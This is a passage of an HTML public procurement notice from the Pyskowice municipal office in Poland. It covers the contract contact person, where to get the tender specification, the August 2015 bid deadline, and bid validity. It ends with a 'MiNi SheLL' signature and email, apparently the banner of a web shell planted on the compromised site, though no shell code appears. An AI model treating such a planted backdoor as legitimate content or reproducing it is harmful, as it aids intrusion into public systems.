7.Osobą ze strony Zamawiającego do ustalania szczegółów związanych z podpisaniem umowy po wyborze najkorzystniejszej oferty, będzie:
Gerard Przybyła tel. 32 332 60 47.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.pyskowice.pl.<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Pyskowicach , ul. Strzelców Bytomskich 3, 44-120 Pyskowice, pok. 307.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.08.2015 godzina 10:00, miejsce: Urząd Miejski w Pyskowicach , ul. Strzelców Bytomskich 3, 44-120 Pyskowice w Biurze Obsługi Interesanta pok. 107 na parterze..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com